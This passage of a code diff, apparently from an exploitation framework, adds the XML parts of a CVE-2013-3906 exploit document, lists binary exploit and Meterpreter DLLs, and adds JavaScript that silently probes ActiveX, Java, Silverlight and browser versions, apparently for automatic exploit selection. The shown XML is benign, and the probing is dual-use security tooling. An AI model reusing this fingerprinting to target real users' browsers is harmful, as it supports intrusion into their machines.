<w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
<w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Bibliography" w:uiPriority="37"/>
<w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
</w:latentStyles>
<w:style w:type="paragraph" w:default="1" w:styleId="Normal">
<w:name w:val="Normal"/>
<w:qFormat/>
<w:rsid w:val="00063BF6"/>
</w:style>
<w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
<w:name w:val="Default Paragraph Font"/>
<w:uiPriority w:val="1"/>
<w:semiHidden/>
<w:unhideWhenUsed/>
</w:style>
<w:style w:type="table" w:default="1" w:styleId="TableNormal">
<w:name w:val="Normal Table"/>
<w:uiPriority w:val="99"/>
<w:semiHidden/>
<w:unhideWhenUsed/>
<w:qFormat/>
<w:tblPr>
<w:tblInd w:w="0" w:type="dxa"/>
<w:tblCellMar>
<w:top w:w="0" w:type="dxa"/>
<w:left w:w="108" w:type="dxa"/>
<w:bottom w:w="0" w:type="dxa"/>
<w:right w:w="108" w:type="dxa"/>
</w:tblCellMar>
</w:tblPr>
</w:style>
<w:style w:type="numbering" w:default="1" w:styleId="NoList">
<w:name w:val="No List"/>
<w:uiPriority w:val="99"/>
<w:semiHidden/>
<w:unhideWhenUsed/>
</w:style>
<w:style w:type="paragraph" w:styleId="BalloonText">
<w:name w:val="Balloon Text"/>
<w:basedOn w:val="Normal"/>
<w:link w:val="BalloonTextChar"/>
<w:uiPriority w:val="99"/>
<w:semiHidden/>
<w:unhideWhenUsed/>
<w:rsid w:val="00CD271A"/>
<w:pPr>
<w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
</w:pPr>
<w:rPr>
<w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
<w:sz w:val="16"/>
<w:szCs w:val="16"/>
</w:rPr>
</w:style>
<w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
<w:name w:val="Balloon Text Char"/>
<w:basedOn w:val="DefaultParagraphFont"/>
<w:link w:val="BalloonText"/>
<w:uiPriority w:val="99"/>
<w:semiHidden/>
<w:rsid w:val="00CD271A"/>
<w:rPr>
<w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
<w:sz w:val="16"/>
<w:szCs w:val="16"/>
</w:rPr>
</w:style>
</w:styles>

283
data/exploits/CVE-2013-3906/word/theme/theme1.xml Executable file
View File

@ -0,0 +1,283 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
<a:themeElements>
<a:clrScheme name="Office">
<a:dk1>
<a:sysClr val="windowText" lastClr="000000"/>
</a:dk1>
<a:lt1>
<a:sysClr val="window" lastClr="FFFFFF"/>
</a:lt1>
<a:dk2>
<a:srgbClr val="1F497D"/>
</a:dk2>
<a:lt2>
<a:srgbClr val="EEECE1"/>
</a:lt2>
<a:accent1>
<a:srgbClr val="4F81BD"/>
</a:accent1>
<a:accent2>
<a:srgbClr val="C0504D"/>
</a:accent2>
<a:accent3>
<a:srgbClr val="9BBB59"/>
</a:accent3>
<a:accent4>
<a:srgbClr val="8064A2"/>
</a:accent4>
<a:accent5>
<a:srgbClr val="4BACC6"/>
</a:accent5>
<a:accent6>
<a:srgbClr val="F79646"/>
</a:accent6>
<a:hlink>
<a:srgbClr val="0000FF"/>
</a:hlink>
<a:folHlink>
<a:srgbClr val="800080"/>
</a:folHlink>
</a:clrScheme>
<a:fontScheme name="Office">
<a:majorFont>
<a:latin typeface="Cambria"/>
<a:ea typeface=""/>
<a:cs typeface=""/>
<a:font script="Jpan" typeface=" ゴシック"/>
<a:font script="Hang" typeface="맑은 고딕"/>
<a:font script="Hans" typeface="宋体"/>
<a:font script="Hant" typeface="新細明體"/>
<a:font script="Arab" typeface="Times New Roman"/>
<a:font script="Hebr" typeface="Times New Roman"/>
<a:font script="Thai" typeface="Angsana New"/>
<a:font script="Ethi" typeface="Nyala"/>
<a:font script="Beng" typeface="Vrinda"/>
<a:font script="Gujr" typeface="Shruti"/>
<a:font script="Khmr" typeface="MoolBoran"/>
<a:font script="Knda" typeface="Tunga"/>
<a:font script="Guru" typeface="Raavi"/>
<a:font script="Cans" typeface="Euphemia"/>
<a:font script="Cher" typeface="Plantagenet Cherokee"/>
<a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
<a:font script="Tibt" typeface="Microsoft Himalaya"/>
<a:font script="Thaa" typeface="MV Boli"/>
<a:font script="Deva" typeface="Mangal"/>
<a:font script="Telu" typeface="Gautami"/>
<a:font script="Taml" typeface="Latha"/>
<a:font script="Syrc" typeface="Estrangelo Edessa"/>
<a:font script="Orya" typeface="Kalinga"/>
<a:font script="Mlym" typeface="Kartika"/>
<a:font script="Laoo" typeface="DokChampa"/>
<a:font script="Sinh" typeface="Iskoola Pota"/>
<a:font script="Mong" typeface="Mongolian Baiti"/>
<a:font script="Viet" typeface="Times New Roman"/>
<a:font script="Uigh" typeface="Microsoft Uighur"/>
<a:font script="Geor" typeface="Sylfaen"/>
</a:majorFont>
<a:minorFont>
<a:latin typeface="Calibri"/>
<a:ea typeface=""/>
<a:cs typeface=""/>
<a:font script="Jpan" typeface=" 明朝"/>
<a:font script="Hang" typeface="맑은 고딕"/>
<a:font script="Hans" typeface="宋体"/>
<a:font script="Hant" typeface="新細明體"/>
<a:font script="Arab" typeface="Arial"/>
<a:font script="Hebr" typeface="Arial"/>
<a:font script="Thai" typeface="Cordia New"/>
<a:font script="Ethi" typeface="Nyala"/>
<a:font script="Beng" typeface="Vrinda"/>
<a:font script="Gujr" typeface="Shruti"/>
<a:font script="Khmr" typeface="DaunPenh"/>
<a:font script="Knda" typeface="Tunga"/>
<a:font script="Guru" typeface="Raavi"/>
<a:font script="Cans" typeface="Euphemia"/>
<a:font script="Cher" typeface="Plantagenet Cherokee"/>
<a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
<a:font script="Tibt" typeface="Microsoft Himalaya"/>
<a:font script="Thaa" typeface="MV Boli"/>
<a:font script="Deva" typeface="Mangal"/>
<a:font script="Telu" typeface="Gautami"/>
<a:font script="Taml" typeface="Latha"/>
<a:font script="Syrc" typeface="Estrangelo Edessa"/>
<a:font script="Orya" typeface="Kalinga"/>
<a:font script="Mlym" typeface="Kartika"/>
<a:font script="Laoo" typeface="DokChampa"/>
<a:font script="Sinh" typeface="Iskoola Pota"/>
<a:font script="Mong" typeface="Mongolian Baiti"/>
<a:font script="Viet" typeface="Arial"/>
<a:font script="Uigh" typeface="Microsoft Uighur"/>
<a:font script="Geor" typeface="Sylfaen"/>
</a:minorFont>
</a:fontScheme>
<a:fmtScheme name="Office">
<a:fillStyleLst>
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:tint val="50000"/>
<a:satMod val="300000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="35000">
<a:schemeClr val="phClr">
<a:tint val="37000"/>
<a:satMod val="300000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:tint val="15000"/>
<a:satMod val="350000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:lin ang="16200000" scaled="1"/>
</a:gradFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:shade val="51000"/>
<a:satMod val="130000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="80000">
<a:schemeClr val="phClr">
<a:shade val="93000"/>
<a:satMod val="130000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:shade val="94000"/>
<a:satMod val="135000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:lin ang="16200000" scaled="0"/>
</a:gradFill>
</a:fillStyleLst>
<a:lnStyleLst>
<a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
<a:solidFill>
<a:schemeClr val="phClr">
<a:shade val="95000"/>
<a:satMod val="105000"/>
</a:schemeClr>
</a:solidFill>
<a:prstDash val="solid"/>
</a:ln>
<a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:prstDash val="solid"/>
</a:ln>
<a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:prstDash val="solid"/>
</a:ln>
</a:lnStyleLst>
<a:effectStyleLst>
<a:effectStyle>
<a:effectLst>
<a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0">
<a:srgbClr val="000000">
<a:alpha val="38000"/>
</a:srgbClr>
</a:outerShdw>
</a:effectLst>
</a:effectStyle>
<a:effectStyle>
<a:effectLst>
<a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
<a:srgbClr val="000000">
<a:alpha val="35000"/>
</a:srgbClr>
</a:outerShdw>
</a:effectLst>
</a:effectStyle>
<a:effectStyle>
<a:effectLst>
<a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
<a:srgbClr val="000000">
<a:alpha val="35000"/>
</a:srgbClr>
</a:outerShdw>
</a:effectLst>
<a:scene3d>
<a:camera prst="orthographicFront">
<a:rot lat="0" lon="0" rev="0"/>
</a:camera>
<a:lightRig rig="threePt" dir="t">
<a:rot lat="0" lon="0" rev="1200000"/>
</a:lightRig>
</a:scene3d>
<a:sp3d>
<a:bevelT w="63500" h="25400"/>
</a:sp3d>
</a:effectStyle>
</a:effectStyleLst>
<a:bgFillStyleLst>
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:tint val="40000"/>
<a:satMod val="350000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="40000">
<a:schemeClr val="phClr">
<a:tint val="45000"/>
<a:shade val="99000"/>
<a:satMod val="350000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:shade val="20000"/>
<a:satMod val="255000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:path path="circle">
<a:fillToRect l="50000" t="-80000" r="50000" b="180000"/>
</a:path>
</a:gradFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:tint val="80000"/>
<a:satMod val="300000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:shade val="30000"/>
<a:satMod val="200000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:path path="circle">
<a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
</a:path>
</a:gradFill>
</a:bgFillStyleLst>
</a:fmtScheme>
</a:themeElements>
<a:objectDefaults/>
<a:extraClrSchemeLst/>
</a:theme>

4
data/exploits/CVE-2013-3906/word/webSettings.xml Executable file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:optimizeForBrowser/>
</w:webSettings>

BIN
data/exploits/cve-2013-0074/SilverApp1.dll Executable file
View File

Binary file not shown.

BIN
data/exploits/cve-2013-0074/SilverApp1.xap Executable file
View File

Binary file not shown.

BIN
data/exploits/cve-2013-3660/exploit.dll
View File

Binary file not shown.

BIN
data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll Executable file
View File

Binary file not shown.

42
data/js/detect/addons.js → data/js/detect/ie_addons.js
View File

@ -1,9 +1,47 @@
window.addons_detect = { };
window.ie_addons_detect = { };
/**
* Returns true if this ActiveX is available, otherwise false.
* Grabbed this directly from browser_autopwn.rb
**/
window.ie_addons_detect.hasActiveX = function (axo_name, method) {
var axobj = null;
if (axo_name.substring(0,1) == String.fromCharCode(123)) {
axobj = document.createElement("object");
axobj.setAttribute("classid", "clsid:" + axo_name);
axobj.setAttribute("id", axo_name);
axobj.setAttribute("style", "visibility: hidden");
axobj.setAttribute("width", "0px");
axobj.setAttribute("height", "0px");
document.body.appendChild(axobj);
if (typeof(axobj[method]) == 'undefined') {
var attributes = 'id="' + axo_name + '"';
attributes += ' classid="clsid:' + axo_name + '"';
attributes += ' style="visibility: hidden"';
attributes += ' width="0px" height="0px"';
document.body.innerHTML += "<object " + attributes + "></object>";
axobj = document.getElementById(axo_name);
}
} else {
try {
axobj = new ActiveXObject(axo_name);
} catch(e) {
// If we can't build it with an object tag and we can't build it
// with ActiveXObject, it can't be built.
return false;
};
}
if (typeof(axobj[method]) != 'undefined') {
return true;
}
return false;
};
/**
* Returns the version of Microsoft Office. If not found, returns null.
**/
window.addons_detect.getMsOfficeVersion = function () {
window.ie_addons_detect.getMsOfficeVersion = function () {
var version;
var types = new Array();
for (var i=1; i <= 5; i++) {

110
data/js/detect/misc_addons.js Normal file
View File

@ -0,0 +1,110 @@
window.misc_addons_detect = { };
/**
* Detects whether the browser supports Silverlight or not
**/
window.misc_addons_detect.hasSilverlight = function () {
var found = false;
//
// When on IE, we can use AgControl.AgControl to actually detect the version too.
// But this ability is specific to IE, so we fall back to just true/false response
//
try {
var ax = new ActiveXObject('AgControl.AgControl');
found = true;
} catch(e) {}
//
// ActiveX didn't get anything, try looking in MIMEs
//
if (!found) {
var mimes = window.navigator.mimeTypes;
for (var i=0; i < mimes.length; i++) {
if (/x\-silverlight/.test(mimes[i].type)) {
found = true;
break;
}
}
}
//
// MIMEs didn't work either. Try navigator.
//
if (!found) {
var count = navigator.plugins.length;
for (var i=0; i < count; i++) {
var pluginName = navigator.plugins[i].name;
if (/Silverlight Plug\-In/.test(pluginName)) {
found = true;
break;
}
}
}
return found;
}
/**
* Returns the Java version
**/
window.misc_addons_detect.getJavaVersion = function () {
var foundVersion = null;
//
// This finds the Java version from Java WebStart's ActiveX control
// This is specific to Windows
//
for (var i1=0; i1 < 10; i1++) {
for (var i2=0; i2 < 10; i2++) {
for (var i3=0; i3 < 10; i3++) {
for (var i4=0; i4 < 10; i4++) {
var version = String(i1) + "." + String(i2) + "." + String(i3) + "." + String(i4);
var progId = "JavaWebStart.isInstalled." + version;
try {
new ActiveXObject(progId);
return version;
}
catch (e) {
continue;
}
}}}}
//
// This finds the Java version from window.navigator.mimeTypes
// This seems to work pretty well for most browsers except for IE
//
if (foundVersion == null) {
var mimes = window.navigator.mimeTypes;
for (var i=0; i<mimes.length; i++) {
var m = /java.+;version=(.+)/.exec(mimes[i].type);
if (m) {
var version = parseFloat(m[1]);
if (version > foundVersion) {
foundVersion = version;
}
}
}
}
//
// This finds the Java version from navigator plugins
// This is necessary for Windows + Firefox setup, but the check isn't as good as the mime one.
// So we do this last.
//
if (foundVersion == null) {
var foundJavaString = "";
var pluginsCount = navigator.plugins.length;
for (i=0; i < pluginsCount; i++) {
var pluginName = navigator.plugins[i].name;
var pluginVersion = navigator.plugins[i].version;
if (/Java/.test(pluginName) && pluginVersion != undefined) {
foundVersion = navigator.plugins[i].version;
break;
}
}
}
return foundVersion;
}

12
data/js/detect/os.js
View File

@ -210,7 +210,11 @@ window.os_detect.getVersion = function(){
// Thanks to developer.mozilla.org "Firefox for developers" series for most
// of these.
// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
if (css_is_valid('background-attachment',
if (css_is_valid('image-orientation',
'imageOrientation',
'0deg')) {
ua_version = '26.0';
} else if (css_is_valid('background-attachment',
'backgroundAttachment',
'local')) {
ua_version = '25.0';
@ -867,6 +871,12 @@ window.os_detect.getVersion = function(){
os_flavor = "7";
os_sp = "SP1";
break;
case "10016720":
// IE 10.0.9200.16721 / Windows 7 SP1
ua_version = "10.0";
os_flavor = "7";
os_sp = "SP1";
break;
case "1000":
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
ua_version = "10.0";

21
data/js/network/ajax_download.js
View File

@ -1,25 +1,16 @@
function ajax_download(oArg) {
var method = oArg.method;
var path = oArg.path;
var data = oArg.data;
if (!oArg.method) { oArg.method = "GET"; }
if (!oArg.path) { throw "Missing parameter 'path'"; }
if (!oArg.data) { oArg.data = null; }
if (method == undefined) { method = "GET"; }
if (method == path) { throw "Missing parameter 'path'"; }
if (data == undefined) { data = null; }
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest();
}
else {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}
var xmlHttp = new XMLHttpRequest();
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open(method, path, false);
xmlHttp.send(data);
xmlHttp.open(oArg.method, oArg.path, false);
xmlHttp.send(oArg.data);
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
return xmlHttp.responseText;
}

10
data/js/network/ajax_post.js Normal file
View File

@ -0,0 +1,10 @@
function postInfo(path, data) {
var xmlHttp = new XMLHttpRequest();
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open('POST', path, false);
xmlHttp.send(data);
}

15
data/js/network/xhr_shim.js Normal file
View File

@ -0,0 +1,15 @@
if (!window.XMLHTTPRequest) {
(function() {
var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
for (idx = 0; idx < activeObjs.length; idx++) {
try {
new ActiveXObject(activeObjs[idx]);
window.XMLHttpRequest = function() {
return new ActiveXObject(activeObjs[idx]);
};
break;
}
catch (e) {}
}
})();
}

BIN
data/meterpreter/elevator.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_extapi.x64.dll Executable file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_extapi.x86.dll Executable file
View File

Binary file not shown.

BIN
